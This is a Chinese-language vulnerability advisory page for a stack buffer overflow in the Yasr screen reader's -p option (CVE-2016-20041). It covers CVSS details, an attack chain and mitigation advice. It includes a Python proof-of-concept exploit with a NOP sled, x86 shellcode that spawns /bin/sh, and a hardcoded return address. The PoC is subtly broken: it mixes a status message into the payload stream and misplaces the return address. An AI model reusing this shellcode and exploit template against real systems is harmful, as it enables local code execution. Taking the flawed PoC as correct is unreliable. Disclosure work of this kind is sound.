CVE-2016-20041 CVSS 8.4 高危

CVE-2016-20041 Yasr缓冲区溢出漏洞

披露日期: 2026-03-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2016-20041

漏洞类型

缓冲区溢出

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Yasr

漏洞概述

Yasr 0.6.9-5版本在处理-p参数时存在缓冲区溢出漏洞。本地攻击者无需认证，通过提供超长参数即可触发该漏洞，导致应用崩溃或执行任意代码，严重影响系统安全。

技术细节

CVE-2016-20041是Yasr（Yet Another Screen Reader）软件中的一个经典栈缓冲区溢出漏洞。该漏洞的根源在于程序对命令行参数（特别是-p参数）的处理逻辑存在缺陷，未对用户输入的字符串长度进行有效校验。攻击者可以向该参数传入一个精心设计的超长字符串，该字符串通常由三部分组成：用于填充缓冲区的垃圾数据、用于执行恶意操作的Shellcode以及用于覆盖函数返回地址的特定指针。当Yasr程序解析该参数时，由于缺乏边界检查，数据会溢出预分配的栈缓冲区，进而覆盖相邻的栈帧数据，包括关键的返回地址。一旦返回地址被成功劫持，程序在函数返回时将跳转到攻击者指定的位置（即Shellcode处），从而赋予攻击者本地执行任意代码的权限，完全控制受影响系统。此漏洞利用无需用户交互且无需认证，危害性较高。

攻击链分析

STEP 1

侦察

攻击者确认目标系统安装了存在漏洞的Yasr 0.6.9-5版本。

STEP 2

制作Payload

攻击者编写包含垃圾数据、Shellcode及特定返回地址的恶意字符串。

STEP 3

触发漏洞

攻击者在本地执行命令，将恶意字符串作为参数传递给Yasr的-p选项。

STEP 4

执行代码

溢出发生，栈返回地址被覆盖，程序跳转执行攻击者的Shellcode。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2016-20041 (Yasr Buffer Overflow)
# Usage: python3 poc.py | xargs yasr -p

import struct

# Payload construction
# Offset to overwrite EIP (Example value, needs debugging)
offset = 1036
padding = b"A" * offset

# Shellcode (Example: exec /bin/sh)
# This is a placeholder, actual shellcode depends on the target OS/Arch
shellcode = b"\x90" * 32  # NOP sled
shellcode += b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

# Return address (Example address)
ret_addr = struct.pack("<I", 0xbffffe01) 

payload = padding + shellcode + ret_addr

try:
    print("Sending payload to yasr -p ...")
    # In a real scenario, this would pass the payload to the binary
    print(payload.decode('latin-1'))
except Exception as e:
    print(f"Error: {e}")

影响范围

Yasr 0.6.9-5

防御指南

临时缓解措施

建议立即停止使用受影响版本的Yasr软件，并升级到官方发布的修复版本。若无法立即升级，应严格限制本地用户对程序的执行权限，避免通过命令行参数传入不可信数据。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表